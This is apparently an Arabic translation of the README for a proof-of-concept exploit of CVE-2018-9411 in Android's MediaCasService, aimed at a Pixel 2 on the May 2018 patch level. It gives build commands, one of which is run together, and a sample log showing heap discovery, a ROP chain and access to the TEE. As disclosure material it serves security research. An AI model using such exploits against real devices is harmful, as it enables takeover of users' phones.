
كود استغلال لـ CVE-2018-9411 لـ MediaCasService
كود استغلال الثغرة CVE-2018-9411 لخدمة MediaCasService.
لاحظ أن هذا الاستغلال يُقدَّم فقط لأغراض تعليمية أو دفاعية؛ ولا يُقصد منه أي استخدام ضار أو هجومي.
الشرح الكامل للثغرة والاستغلال متاح على مدونة Zimperium.
إذا كان لديك أي أسئلة، يمكنك مراسلتي على تويتر (@tamir_zb).
ملاحظة: هذا الاستغلال مصمم للعمل فقط على جهاز وإصدار محددين - Pixel 2 مع تحديث الأمان لشهر مايو 2018 (البصمة: google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys).
للبناء:
AOSP/external.cd AOSP
source build/envsetup.sh
make cas_exploit
تشغيل ناجح لهذا الاستغلال يجب أن يحصل على وصول إلى جهاز TEE، والذي سيتم إظهاره عن طريق الحصول على إصدار QSEOS.
مثال على مخرجات الاستغلال:
[+] Prepared descrambler object
[+] Determined small heap address (address = 0xec9d8000)
[+] Prepared remote threads
[+] Found target thread (stack address = 0xeb42b000, libc address = 0xec51d000)
[+] Copied data for ROP chain
[+] ROP stack written
[+] Running ROP chain...
[+] QSEOS version = 0x14